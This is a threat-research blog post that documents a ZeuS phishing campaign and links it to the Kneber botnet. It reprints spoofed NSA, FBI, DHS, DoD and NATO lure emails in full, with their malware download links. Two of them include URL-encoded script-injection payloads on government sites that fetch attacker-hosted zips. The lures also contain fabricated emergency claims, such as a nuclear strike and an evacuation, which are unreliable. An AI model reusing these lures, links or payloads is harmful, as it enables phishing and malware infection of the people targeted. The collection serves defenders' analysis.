Crime or Espionage? Part 2



In “Crime or Espionage Part 1” I examined a series of attacks that appear to be aimed at those interested in intelligence issues and those in the government and military. The malware used in these attacks was ZeuS and there are common command and control elements used in the attacks beginning in December 2009 and continuing until late August 2010. In addition, these attacks have been linked to infrastructure used by the Kneber botnet, a ZeuS-based botnet discovered by Netwitness.

This post is an overview of a collection of publicly available emails associated with these ongoing series of attacks. These are the socially engineered emails designed to lure potential victims into clicking on and executing the attackers’ malicious code. While the attacks are not targeted down to the individual, or even institutional level, and appear to have been sent to a wide variety of targets, the content of the emails is geared towards those interested in intelligence, military and security issues.

The malicious emails appear to have been sent from email addresses associated with the following domain names: nsa.gov, greylogic.us, pentagon.af.mil, fbi.gov, dia.mil, dhs.gov, stratcom.mil and ifc.nato.int. With the exception of Jeff Carr’s Grey Logic, the emails appear to come from government and military sources. The subject lines and the text of the emails largely focus on security issues with some messages making use of classification markings such as “U//FOUO” and official looking email footers in order to appear to be legitimate.

The links in to the malicious files contained within the emails make use of a variety of hosts. The attackers will often include a link to the file sharing services rapidshare.com, sendspace.com and depositfiles.com. The attackers also use compromised legitimate websites, many of which are running the Joomla! CMS. However, at other times the attackers have used domain names registered specifically for malicious purposes:

dnicenter.com – abuseemaildhcp@gmail.com
dhsorg.org – hilarykneber@yahoo.com

The email addresses abuseemaildhcp@gmail.com and hilarykneber@yahoo.com are well known and have been used to register numerous domain names associated with malware, mostly ZeuS.

The “hilarykneber@yahoo.com” email address was made famous by discovery of the Kneber botnet by Netwitness. Netwitness revealed that many of the compromised computers in the US included government networks as well as Fortune 500 enterprises. This is not entirely surprising as any large botnet is likely to have compromised some government computers. But, the recognition of this fact may be the catalyst for the series of attacks using intelligence, military and security themes as lure. Not all compromised computers are of the same value, surely the attackers realize this. In “Conversations With a Blackhat” RSnake outlines this scenario:

There are already other types of bad guys who do things like spam, steal credentials and DDoS. For that to work they need a botnet with thousands or millions of machines. The chances of a million machine botnet having compromised at least one machine within a target of interest is relatively high.

So let’s say I’m badguy1 who wants to break into one or more companies of interest. Sure, I could work for days or weeks and maybe get into one or both of them, but at the risk of tipping my hand to the companies and there’s always a chance I’ll fail entirely. Or I could work with badguy2 who has a botnet. I could simply give a list of IPs, domains or email addresses of known targets to the bot herder and say that instead of paying a few cents to rent some arbitrary machine for a day, I’ll pay thousands of dollars to get a bot within the company I’m actually interested in.

A variation of this is a scenario in which the botmaster grows the botnet but through means that increase the chances of compromising a target of interest that “badguy1″ wants to compromise. By using intelligence, military and security issues and themes in the lure emails, perhaps the attackers are aiming to increase the likelihood of compromising a sensitive location. In such a scenario, the botmaster is happy to get some new bots connecting in with the Zeus command and control server (from which credentials and other information can be extracted) and can also sell any sensitive data that’s been stolen or sell access to any sensitive compromised computer.

The emails below are a collection of publicly available emails associated with a series of ongoing of attacks using Zeus.

December 9, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://contagiodump.blogspot.com/2009/12/creative-nsa-spoof-attack-of-day.html

From: ecu@nsa.gov
Date: December 9, 2009 4:33:51 PM GMT+05:00
Subject: CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS

AFRL-RI-RS-TR-2009-136
Final Technical Report
December 2009

CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS (CYBERCAFE)

INFORMATION SUBJECT TO EXPORT CONTROL LAWS

WARNING – This document contains technical data whose export is restricted by the Arms Export Control Act (Title 22, U.S.C., Sec 2751 et seq.) or the Export Administration Act of 1979, as amended (Title 50, U.S.C. App. 2401, et seq.). Violations of these export laws are subject to severe criminal penalties. Disseminate IAW DoDD 5230.25.

DESTRUCTION NOTICE – For classified documents, follow the procedures in DOD 5220.22-M, National Industrial Security Manual (NISPOM), section 5-705 or DOD 5200.1-R, Information Security Program, Chapter VI. For unclassified limited documents, destroy by any method that will prevent disclosure of contents or reconstruction of the document.

Export of the attached information (which includes, in some circumstances, release to foreign nationals within the United States) without first obtaining approval or license from the Department of State for items controlled by the International Traffic in ArmsRegulation (ITAR), or the Department of Commerce for items controlled by the Export Administration Regulation (EAR), may constitute a violation of law.

Download:

http://www.zeropaid.com/bbs/includes/CYBERCAFE.zip

or

http://rapidshare.com/files/318309046/CYBERCAFE.zip.html

http://www.sendspace.com/file/fmbt01

December 14, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://groups.yahoo.co.jp/group/boxing-fun/message/20326?threaded=1&viscount=14&expand=1

From: uctd@nsa.gov
Date: December 14, 2009 1:56:24 PM GMT+05:00
Subject: Information Systems Security Reminder

Information Systems Security Reminder

— Users are reminded to be aware and vigilant when using government information services both inside and outside protected environments.

— Be aware of your surroundings when accessing these services remotely, and prefer trusted workstations. Evaluate the security risks inherent with use of public workstations, including “shoulder surfing” by nearby persons.

— When communicating via email, know with whom you are communicating. Common adversary techniques include social engineering, email phishing, and evocative attachments. Government system capabilities may only be discussed with authorized personnel.

— If you make an error (e.g., data spill), report it so that the problem can be addressed. Report any anomalies you observe to your security office or service desk.

Security Software:

http://hkcaregroup.com/modlogan/MILSOFT.zip

or

http://rapidshare.com/files/320369638/MILSOFT.zip.html

http://fcpra.org/downloads/MILSOFT.zip

February 10, 2010
Source: http://www.nartv.org/2010/03/01/the-kneber-botnet-spear-phishing-attacks-and-crimeware/

From: jeffreyc@greylogic.us
Date: Wednesday, February 10, 2010 7:34 AM
Subject: Russian spear phishing attack against .mil and .gov employees

Russian spear phishing attack against .mil and .gov employees

A “relatively large” number of U.S. government and military employees are being taken in by a spear phishing attack which delivers a variant of the Zeus trojan. The email address is spoofed to appear to be from the NSA or InteLink concerning a report by the National Intelligence Council named the “2020 Project”. It’s purpose is to collect passwords and obtain remote access to the infected hosts.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft(r) Windows(r) and gain complete control over it. You can help protect your
computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://fcpra.org/downloads/winupdate.zip

or

http://www.sendspace.com/file/tj373l

___________
Jeffrey Carr is the CEO of GreyLogic, the Founder and Principal
Investigator of Project Grey Goose, and the author of “Inside Cyber Warfare”.
jeffreyc@greylogic.us

February 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg12517.html

From: jeffreyc@nsa.gov
Date: February 11, 2010 9:39:15 AM GMT+05:00
Subject: RE: Zeus Attack Spoofs NSA, Targets .gov and .mil

Zeus Attack Spoofs NSA, Targets .gov and .mil

Criminals are spamming the Zeus banking Trojan in a convincing e-mail that spoofs the National Security Agency. Initial reports indicate that a large number of government systems may have been compromised by the attack.

According one state government security expert who received multiple copies of the message, the e-mail campaign — apparently designed to steal passwords from infected systems — was sent exclusively to government (.gov) and military (.mil) e-mail addresses.

The messages are spoofed so that they appear to have been sent by the National Intelligence Council (address used was nic@nsa.gov), which serves as the center for midterm and long-range strategic thinking for the U.S. intelligence community and reports to the office of the Director of National Intelligence.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft® Windows® and gain complete control over it. You can help protect your computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://mv.net.md/update/update.zip

or

http://www.sendspace.com/file/7jmxtq

February 12, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/dod-roles-and-missions-in-homeland-security

From: apacs@pentagon.af.mil
Date: 12 Feb 2010 20:41:01 (GMT)
Subject: DoD Roles and Missions in Homeland Security

Defense Science Board

DoD Roles and Missions in Homeland Security

VOLUME II – A: SUPPORTING REPORTS

This report is a product of the Defense Science Board (DSB). The DSB is a Federal Advisory Committee established to provide independent advice to the Secretary of Defense. Statements, opinions, conclusions and recommendations in this report do not necessarily represent the official position of the Department of Defense.

Download:

http://mv.net.md/dsb/DSB.zip

or

http://www.sendspace.com/file/rdxgzd

___________
Office of the Under Secretary of Defense
For Acquisition, Technology, and Logistics
Washington, D.C. 20301-3140

February 21, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg25834.html

From: cttd@fbi.gov
Date: February 21, 2010 7:37:16 AM GMT+05:00
Subject: INTELLIGENCE BULLETIN

FEDERAL BUREAU OF INVESTIGATION
INTELLIGENCE BULLETIN

February 2010

Weapons of Mass Destruction Directorate

Indicators for Terrorist Use of Toxic Industrial Chemicals

THIS INTELLIGENCE BULLETIN PROVIDES LAW ENFORCEMENT AND OTHER PUBLIC SAFETY OFFICIALS WITH SITUATIONAL AWARENESS CONCERNING INTERNATIONAL AND DOMESTIC TERRORIST TACTICS.

UNCLASSIFIED//FOR OFFICIAL USE ONLY

Download:

http://timingsolution.com/Doc/BULLETIN.zip

or

http://www.sendspace.com/file/goz3yd

___________
HANDLING NOTICE: Recipients are reminded that FBI Intelligence Bulletins contain sensitive terrorism and counterterrorism information meant for use primarily within the law enforcement and homeland security communities. Such bulletins shall not be released, either in written or oral form, to the media, the general public, or other personnel who do not have a valid need-to-know without prior approval from an authorized FBI official, as such release could jeopardize national security.

March 6, 2010
Source: http://aquiacreek.com/showthread.php?1712-URGENT!-Phising-Email-Scam

Office of the Director of National Intelligence INTELLIGENCE BULLETIN UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 7.12 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:

CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE

DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH

DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=%3c%61%20%68%72%65%66%3d%22%6 8%74%74%70%3a%2f%2f%64%6e%69%63%65%6e%74%65%72%2e% 63%6f%6d%2f%64%6f%63%73%2f%72%65%70%6f%72%74%2e%7a %69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3 e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f% 70%65%6e%28%27%68%74%74%70%3a%2f%2f%64%6e%69%63%65 %6e%74%65%72%2e%63%6f%6d%2f%64%6f%63%73%2f%72%65%7 0%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70% 74%3e

________________
Office of the Director of National Intelligence Washington, D.C. 20511

* The actual URL is: http://dnicenter.com/docs/report.zip

March 7, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/for-official-use-only—dprk-missile-attack-on-japan
Source: http://www.omninerd.com/articles/A_Short_Look_into_a_Phishing_Email

From: SSC@dia.mil
Date: 7 Mar 2010 14:17:51 (GMT)
Subject: FOR OFFICIAL USE ONLY

Office of the Director of National Intelligence
INTELLIGENCE BULLETIN
UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:

CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE

DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH

DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://www.mod.gov.ge/2007/video/movie.php?l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70%74%3e%3c%22

________________
Office of the Director of National Intelligence
Washington, D.C. 20511

* The actual URL is: http://officialweightlosshelp.org/wp-admin/report.zip

March 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://dl.ambiweb.de/mirrors/www.tldp.org/LDP/LGNET/173/lg_launderette.html

From: hsi@dhs.gov
Date: March 11, 2010 11:38:56 PM GMT+05:00
Subject: U.S. Department of Homeland Security

Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED

11 March 2010

Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
________

The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
________

In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.

In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:

http://dhsorg.org/docs/instructions.zip

________________
U.S. Department of Homeland Security
Washington, DC 20528

March 13, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/re-instructions-unclassified

From: NSI@dhs.gov
Date: 13 Mar 2010 18:26:54 (GMT)
Subject: RE: Instructions UNCLASSIFIED

U.S. Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED

13 March 2010

Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
______________________

The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
______________________

In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.

In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:

http://www.sendspace.com/file/h96uh1

or

http://depositfiles.com/files/xj1wvamc4

________________________________________
U.S. Department of Homeland Security
Washington, DC 20528

June 16, 2010
Source: http://www.clearancejobs.com/security_tips.php

From: rss@stratcom.mil
Date: Wed Jun 16 13:10:08 2010
Subject: From STRATCOM to

,

United States Strategic Command

Commanders Reading List

Professional development is essential to the successful execution of our mission – to provide global security for America. One key component to professional development is reading and critically thinking about military issues, history, and leadership. I am pleased to announce the following selections for my 2010 Commander’s Professional Reading List. It is my intent that this list will serve as a guide for all STRATCOM military and civilian personnel to enhance their professional knowledge.

All of the titles below are available immediately for check-out at the Thomas S. Power Library on base and in the USSTRATCOM Leadership Institute.

Our overarching objective is to provide global security to our nation-the best in the world. I encourage everyone to read these titles and continue your professional development so you can continue to be the finest operators, planners, and advocates for STRATCOM and its global mission set.

KEVIN P. CHILTON
General, USAF
Commander

Inside Cyber Warfare: Mapping the Cyber Underworld (Dec 2009)

This book provides fascinating and disturbing details on how nations, groups, and individuals throughout the world are using the Internet as an attack platform to gain military, political, and economic advantages over their adversaries. Discusses how sophisticated hackers, working on behalf of states or organized crime, patiently play a high-stakes game targeting anyone, regardless of affiliation or nationality. (Amazon.com)

Author: Jeffrey Carr is a cyber intelligence expert, columnist for Symantec’s Security Focus, and author who specializes in the investigation of cyber attacks against governments and infrastructures by State and Non-State hackers. Mr. Carr is the Principal Investigator for Project Grey Goose, an Open Source intelligence investigation into the Russian cyber attacks on Georgia in August, 2008. His work has been quoted in The New York Times, The Washington Post, The Guardian, BusinessWeek, Parameters, and Wired.

Additional information can be found in the following report:

http://tiesiog.puikiai.lt/report.zip

http://somashop.lv/report.zip

________________________________________
To report a problem please submit an ODNI/ICES Ticket
Phone: 301-688-1800 (commercial), 644-1800 (DSN), 363-6105 (NSTS)”

June 17, 2010
Source: http://kerneltrap.org/mailarchive/openbsd-bugs/2010/6/17/6884952
Source: http://www.mail-archive.com/ports@openbsd.org/msg28673.html

From: izhar.mujaddid@pentagon.af.mil
Date: Thursday, June 17, 2010 – 11:57 am
Subject: Scientific Advisory Board

UNCLASSIFIED//FOR OFFICIAL USE ONLY

United States Air Force

Scientific Advisory Board

Report on Defending and Operating in a Contested Cyber Domain

Executive Summary and Annotated Brief
SAB-TR-10-01
June 2010

This report is a product of the United States Air Force Scientific Advisory
Board Study Committee on Defending and Operating in a Contested Cyber
Domain. Statements, opinions, findings, recommendations and conclusions
contained in this report are those of the Study Committee and do not
necessarily represent the official position of the United States Air Force or the United States Department of Defense.

Additional information can be found in the following report:

http://www.christianrantsen.dk/report.zip

http://enigmazones.eu/report.zip

________________________________________
HQ USAF/SB
1180 AF PENTAGON RM 5D982
WASHINGTON, DC 20330-1180

June 17, 2010
Source: http://permalink.gmane.org/gmane.linux.debian.qa-packages/33936

From: tsa@dhs.gov
Date: 2010-06-17 18:01:16 GMT
Subject: (U) Transportation Security Administration

UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U) Transportation Security Administration

(U) Terrorist Attack Methods in Airport Terminals

A Predictive Analysis for the Detection-Technology Community

15 June 2010

(U//FOUO) This Transportation Security Administration Office of Intelligence (TSA-OI)
assessment, developed at the request of the TSA Office of Security Technology,
examines the terrorist tactics used to attack passengers inside the public areas of an
airport terminal in order to assist in developing security procedures and deploying threat
detection technology to this area. This assessment examined a number of unclassified
sources detailing disrupted plots, bombings, suicide bombers, and armed assaults
conducted in the public areas of airports from the 1960s to the present. Additionally,
attacks on other critical infrastructure targets were reviewed in order to assess which
tactics are more likely to be considered by terrorists targeting airport terminals.

Additional information can be found in the following report:

http://www.christianrantsen.dk/report.zip

http://enigmazones.eu/report.zip

________________________________________
Department of Homeland Security
Office of Infrastructure Protection
Infrastructure Security Compliance Division
Mail Stop 8100
Washington, DC 20528

* A variety of these emails are also available at: http://www.sophos.com/blogs/sophoslabs/?p=10116

August 26, 2010
Source: http://contagiodump.blogspot.com/2010/08/cve-2010-1240-with-zeus-trojan.html

From: ifc@ifc.nato.int
Date: Thu, 26 Aug 2010 08:24:30 -0500
Subject: From Intelligence Fusion Centre

Intelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QB

FROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EU

Additional information can be found in the following report:

http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip

> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia – operation
> “Atalanta”, is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> – the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
> persons in Somalia;
> – the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
> and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS – EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319

Post a comment.